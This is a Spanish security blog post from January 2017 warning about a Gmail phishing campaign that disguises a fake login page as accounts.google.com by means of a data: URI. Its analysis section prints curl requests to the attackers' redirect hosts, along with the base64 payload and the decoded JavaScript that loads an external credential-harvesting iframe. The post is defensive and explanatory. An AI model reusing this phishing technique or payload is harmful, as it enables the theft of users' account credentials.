Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1096
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
▼
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
▼
enero
(Total:
27
)
- ¿Phineas Fisher es detenido en España? No
- Nueva actualización ISO de BlackArch Linux 2017
- Google Chrome elimina el control de plugins
- Hashcat ya permite crackear el cifrado de disco co...
- Tener un contacto 'AA' en el móvil no sirve para n...
- WhatsApp informará de tu ubicación a los miembros ...
- Mozilla y Google actualizan sus navegadores: dispo...
- Gmail bloqueará por seguridad los archivos adjunto...
- Departamento de Policía pierde 8 años de evidencia...
- Lineage OS: el sucesor de CyanogenMod
- Nueva y sofisticada técnica de Phishing sobre Gmail
- 40 mil dólares de recompensa por descubrir fallo e...
- Graves vulnerabilidades en routers Zyxel distribui...
- OurMine hackeó la cuenta de Twitter del New York T...
- Hackean contraseña del jefe de Seguridad Informáti...
- Detenido en Barcelona un presunto ciberdelincuente...
- El primer cable Ethernet cat. 8 de Wireworld alcan...
- Google Maps también nos dirá la disponibilidad par...
- Raspberry Pi presenta el nuevo Compute Module 3
- Autor de vender un Keylogger que infectó a 16 mil ...
- Disponible actualización de WordPress 4.7.1
- Huawei supera a Samsung y ya lidera la venta de sm...
- La empresa que crackeó el iPhone de San Bernardino...
- Nuevas técnicas de Phishing usando documentos borr...
- Adobe actualiza Flash, Acrobat y Reader para corre...
- Un fallo de Chrome, Safari y Opera permite que rob...
- Kingston presenta el primer pendrive de 2TB
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
396
)
privacidad
(
364
)
google
(
355
)
ransomware
(
341
)
vulnerabilidad
(
307
)
Malware
(
266
)
Windows
(
246
)
android
(
244
)
cve
(
239
)
tutorial
(
238
)
manual
(
223
)
software
(
206
)
hardware
(
197
)
linux
(
127
)
twitter
(
117
)
ddos
(
95
)
WhatsApp
(
92
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
68
)
app
(
65
)
Networking
(
57
)
nvidia
(
53
)
ssd
(
51
)
youtube
(
50
)
firmware
(
44
)
adobe
(
43
)
office
(
41
)
hack
(
40
)
firefox
(
36
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
apache
(
26
)
MAC
(
25
)
programación
(
25
)
exploit
(
23
)
multimedia
(
23
)
javascript
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
Dado que Unbound DNS en OPNsense no soporta DNS sobre HTTPS (DoH) directamente, fue necesario utilizar el plugin DNSCrypt-Proxy. El plugin t...
-
Los servidores MS-SQL están siendo hackeados a través de ataques de fuerza bruta o diccionario que aprovechan las credenciales de cuenta f...
Nueva y sofisticada técnica de Phishing sobre Gmail
martes, 24 de enero de 2017
|
Publicado por
el-brujo
|
Editar entrada
El último intento de phishing (engaño) que se está distribuyendo en Gmail imita
de forma tan exacta la página de correo de Google que los expertos en
seguridad han hecho saltar todas las alarmas: si durante estos días
recibes un correo electrónico con un archivo PDF adjunto que, tras pulsarlo, te redirige al inicio de sesión de Google, bajo ningún concepto introduzcas tus datos. Aunque la URL parezca confiable, no lo es. El método es usar Data Uri en la barra de direcciones del navegador para que no muestra ningún error de certificado SSL/TLS y aparezca el subdominio accounts.google.com en la barra aunque no sea seguido de https.
En una nueva campaña del llamado phishing, un grupo de hackers ha comenzado a distribuir un correo electrónico infectado cuya única intención pasa por robar las cuentas de Gmail de las víctimas. El correo esconde una imagen que a primera vista parece un archivo adjunto, pero cuando el usuario pulsa sobre el fichero es automáticamente redirigido a una página que simula el aspecto del inicio de sesión de Gmail.
Por supuesto, la página a la que redirige el correo es una completa y total estafa. El aspecto de la página es idéntico al que tiene la web oficial para iniciar sesión en Gmail, pero a poco que nos fijemos en la barra de dirección URL veremos que antes del enlace de accounts.google.com aparece el texto de "data:text/html,". Si vemos eso, significa que estamos a punto de caer en el robo de la cuenta.
data:text/html,https://accounts/google.com
El aspecto que luce esta estafa de Gmail es exactamente
el que se puede ver en la captura de pantalla que adjuntamos a
continuación. A primera vista parece que se trata de la página oficial
de Google para el inicio de sesión, pero basta con fijarnos en la URL
para darnos cuenta de que hay algo que no está en orden.
Todo aquel que cae en la trampa no solamente se expone a perder el acceso a su cuenta de Gmail,
sino que además debe enfrentarse al hecho de que todos los contactos
con los que haya intercambiado algún mensaje en su correo electrónico
recibirán esta misma estafa en su propio nombre. De hecho, ahí reside
precisamente el mayor peligro de este engaño: el correo infectado lo envían nuestros propios contactos, quienes sin saberlo a su vez han sido antes infectados por otra víctima.
En todos estos ataques, lo que normalmente ocasiona el robo de las cuentas es la falta de seguridad por parte de los usuarios. Tanto esta campaña de robo de cuentas de Gmail como muchas otras que inevitablemente irán llegando en los próximos meses se pueden evitar por completo añadiendo los ajustes de seguridad que recomienda Google, especialmente el referido a la verificación en dos pasos.
Esta técnica de phishing utiliza algo llamado "URI de datos" para incluir un archivo completo en la barra de localización del navegador. Cuando miras hacia arriba en la barra de localización del navegador y ver 'data: text / html ... ..' que en realidad es una cadena de texto muy larga. Si amplísa la barra de direcciones verás
que hay un montón de espacios en blanco que he eliminado. Pero en la extrema derecha se puede ver el comienzo de lo que es un pedazo muy grande de texto. En realidad, este es un archivo que se abre en una nueva pestaña y crea una página de inicio de sesión de Gmail falsa completamente funcional que envía sus credenciales al atacante.Como se puede ver en la parte izquierda de la barra de localización del navegador, en lugar de "https", tiene "data: text / html" seguido del habitual "https: //accounts.google.com ...". Si no estás prestando mucha atención, ignorarás el preámbulo 'data: text / html' y asumirás que la URL es segura.
URL Falsa:
La URL correcta debe ser:
Análisis del Phishing
Recibes un adjunto con un supuesto PDF:Para abrirlo aparece que tienes que iniciar sesión en Google:
La falsa imagen del adjunto está enlazada a: http://x5.to/A78
ƒ curl -vvvv http://x5.to/A78 * Trying 112.78.125.184... * Connected to x5.to (112.78.125.184) port 80 (#0) > GET /A78 HTTP/1.1 > Host: x5.to > User-Agent: curl/7.43.0 > Accept: */* > < HTTP/1.1 301 Moved Permanently < Date: Fri, 11 Mar 2016 11:38:08 GMT < Server: Apache/2.2.31 < Location: http://bowlanreedesntal.top/services/aboutus.htm
El error 301 redirecciona a un meta tag de refresco para poner la página del data/url usando una codificación en base64 , usando data/text:html
en la URL:ƒ curl http://bowlanreedesntal.top/services/aboutus.htm <meta http-equiv="Refresh" content="0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail src="data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFj</span"> ZShuZXcgUmVnRXhwKCdcXGInK2MrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCczLjIuMTg9 IjE3IDE2IDE5IDIwIDIyIjsyMXsoMTUoKXsxNCAxPTMuMi45KFwnMVwnKTsxLjg9XCc3LzEwLTRc JzsxLjExPVwnMTMgNFwnOzEuMjM9XCdcJzsyLjI0KFwnMzZcJylbMF0uMzUoMSl9KCkpfTM3KDM4 KXt9My4yLjMzLjMyPSI8NiAyNz1cXCIyNjovLzI1LjI4LzI5LzMxLjMwXFwiIDM5PVxcIjQwOiAw OzM0OiA1JTsxMjo1JVxcIj48LzY+IjsnLDEwLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNv bnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHx4fHJlbHxoZWlnaHR8c2hvcnRj dXR8dmFyfGZ1bmN0aW9ufGhhdmV8WW91fHRpdGxlfGJlZW58U2lnbmVkfHRyeXxvdXR8aHJlZnxn ZXRFbGVtZW50c0J5VGFnTmFtZXxib3dsYW5yZWVkZXNudGFsfGh0dHB8c3JjfHRvcHxzZXJ2aWNl c3xodG1sfGNvbnRhY3R1c3xvdXRlckhUTUx8Ym9keXx3aWR0aHxhcHBlbmRDaGlsZHxoZWFkfGNh dGNofGV8c3R5bGV8Ym9yZGVyJy5zcGxpdCgnfCcpKSkK>"
El código Base64 resulta ser código JavaScript:
window.document.title = "You have been Signed out";
try {
(function() {
var link = window.document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = '';
document.getElementsByTagName('head')[0].appendChild(link)
}())
} catch (e) {}
window.document.body.outerHTML = "iframe src=\"http://bowlanreedesntal.top/services/contactus.html\" style=\"border: 0;width: 100%;height:100%\">/iframe>";
Con el resultado final de la carga de un iframe
Fuentes:
https://gist.github.com/timruffles/5c76d2b61c88188e77f6#gistcomment-1968194
http://blog.greggman.com/blog/getting-phished/
https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
1 comentarios :
es otra persona bloquea toda las contraseñas y esta con la cuenta de google
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.